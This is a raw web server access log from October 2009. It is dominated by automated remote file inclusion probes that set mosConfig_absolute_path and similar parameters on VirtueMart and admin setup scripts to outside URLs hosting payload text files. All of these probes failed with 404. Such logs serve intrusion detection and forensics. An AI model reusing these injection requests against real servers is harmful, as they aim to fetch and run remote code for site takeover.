222.231.1.214 - - [22/Oct/2009:01:14:35 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:35 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:35 -0400] "GET /logs/error_log.Q109072000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:38 -0400] "GET /logs/access_log.Q109100600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:38 -0400] "GET /logs/access_log.Q109081200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:39 -0400] "GET /logs/access_log.Q109091700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:39 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:39 -0400] "GET /logs/error_log.Q109070200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:39 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:43 -0400] "GET /logs/access_log.Q109100600%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:43 -0400] "GET /logs/access_log.Q109081200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:43 -0400] "GET /logs/access_log.Q109081000%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:44 -0400] "GET /logs/access_log.Q109081000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:44 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:44 -0400] "GET /logs/error_log.Q109072100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:46 -0400] "GET /logs/access_log.Q109100600%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:46 -0400] "GET /logs/access_log.Q109081200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:46 -0400] "GET /logs/access_log.Q109081000%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:47 -0400] "GET /logs/error_log.Q109092900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:14:48 -0400] "GET //admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:14:48 -0400] "GET /logs//admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:48 -0400] "GET /logs/error_log.Q109091700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:48 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:48 -0400] "GET /logs/error_log.Q109072500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:49 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:49 -0400] "GET /logs/error_log.Q109072100%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:49 -0400] "GET /logs/error_log.Q109091700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:49 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:14:49 -0400] "GET /logs/access_log.Q109090400//admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:14:50 -0400] "GET //admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:14:50 -0400] "GET /logs//admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
59.24.49.35 - - [22/Oct/2009:01:14:50 -0400] "GET /logs/access_log.Q109090400//admin/setup.php?_SERVER[DOCUMENT_ROOT]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:50 -0400] "GET /logs/access_log.Q109072600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:50 -0400] "GET /logs/access_log.Q109060800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:51 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:51 -0400] "GET /logs/error_log.Q109072100%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:51 -0400] "GET /logs/error_log.Q109091700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:51 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:55 -0400] "GET /logs/error_log.Q109090700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:55 -0400] "GET /logs/error_log.Q109071700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:55 -0400] "GET /logs/error_log.Q109092500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:14:55 -0400] "GET /logs/error_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:55 -0400] "GET /logs/error_log.Q109072500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:59 -0400] "GET /logs/error_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:14:59 -0400] "GET /logs/error_log.Q109071700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:00 -0400] "GET /logs/error_log.Q109072500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:01:15:02 -0400] "GET /scripts/dqm_loader.js HTTP/1.0" 200 3374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.231.1.214 - - [22/Oct/2009:01:15:03 -0400] "GET /logs/error_log.Q109051300%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:03 -0400] "GET /logs/error_log.Q109081500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:05 -0400] "GET /logs/error_log.Q109071700%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:05 -0400] "GET /logs/error_log.Q109081500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:05 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:05 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:01:15:05 -0400] "GET /logs/error_log.Q109072900 HTTP/1.0" 200 2278245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.231.1.214 - - [22/Oct/2009:01:15:07 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:07 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:09 -0400] "GET /logs/error_log.Q109051300%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:09 -0400] "GET /logs/error_log.Q109081500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:14 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:14 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:16 -0400] "GET /logs/access_log.Q109082600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:16 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:16 -0400] "GET /logs/error_log.Q109052500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:16 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:01:15:06 -0400] "GET /logs/error_log.Q109072900 HTTP/1.0" 200 2278245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.231.1.214 - - [22/Oct/2009:01:15:23 -0400] "GET /logs/access_log.Q109082600%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:23 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:23 -0400] "GET /logs/error_log.Q109052500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:23 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:26 -0400] "GET /logs/access_log.Q109082600%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:26 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:26 -0400] "GET /logs/error_log.Q109052500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:26 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:33 -0400] "GET /logs/error_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:15:36 -0400] "GET /logs/access_log.Q109080900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:48 -0400] "GET /logs/error_log.Q109052200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:49 -0400] "GET /logs/error_log.Q109052200%20%20//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:51 -0400] "GET /logs/access_log.Q109082500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:51 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:15:56 -0400] "GET /logs/access_log.Q109051400%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:15:57 -0400] "GET /logs/error_log.Q109080800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:57 -0400] "GET /logs/access_log.Q109082500//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:15:57 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:16:04 -0400] "GET /logs/access_log.Q109082500//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:16:04 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/global.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.71.152 - - [22/Oct/2009:01:16:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3173FD494529D0000C6908L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.193.15.3 - - [22/Oct/2009:01:17:07 -0400] "GET /logs/access_log.Q109092600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:01:17:38 -0400] "GET /logs/error_log.Q109041600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.193.15.3 - - [22/Oct/2009:01:17:46 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:17:48 -0400] "GET /logs/access_log.Q109100500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:18:02 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:18:02 -0400] "GET /logs/access_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:18:02 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:18:06 -0400] "GET /logs/error_log.Q109072600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:18:09 -0400] "GET /logs/access_log.Q109081500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:18:11 -0400] "GET /logs/access_log.Q109091700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:18:11 -0400] "GET /logs/error_log.Q109070200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.181.7.63 - - [22/Oct/2009:01:18:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.193.15.3 - - [22/Oct/2009:01:18:37 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
220.100.96.65 - - [22/Oct/2009:01:18:55 -0400] "GET /home.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
220.100.96.65 - - [22/Oct/2009:01:18:55 -0400] "GET /logs/home.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
222.233.52.18 - - [22/Oct/2009:01:18:56 -0400] "GET /logs/index.php?option=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.233.52.18 - - [22/Oct/2009:01:18:56 -0400] "GET /logs/access_log.Q109062900/index.php?option=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.233.52.18 - - [22/Oct/2009:01:18:56 -0400] "GET /index.php?option=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:19:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
64.27.9.117 - - [22/Oct/2009:01:19:03 -0400] "GET /logs/error_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.27.9.117 - - [22/Oct/2009:01:19:04 -0400] "GET /logs/error_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:19:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
209.59.12.99 - - [22/Oct/2009:01:19:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
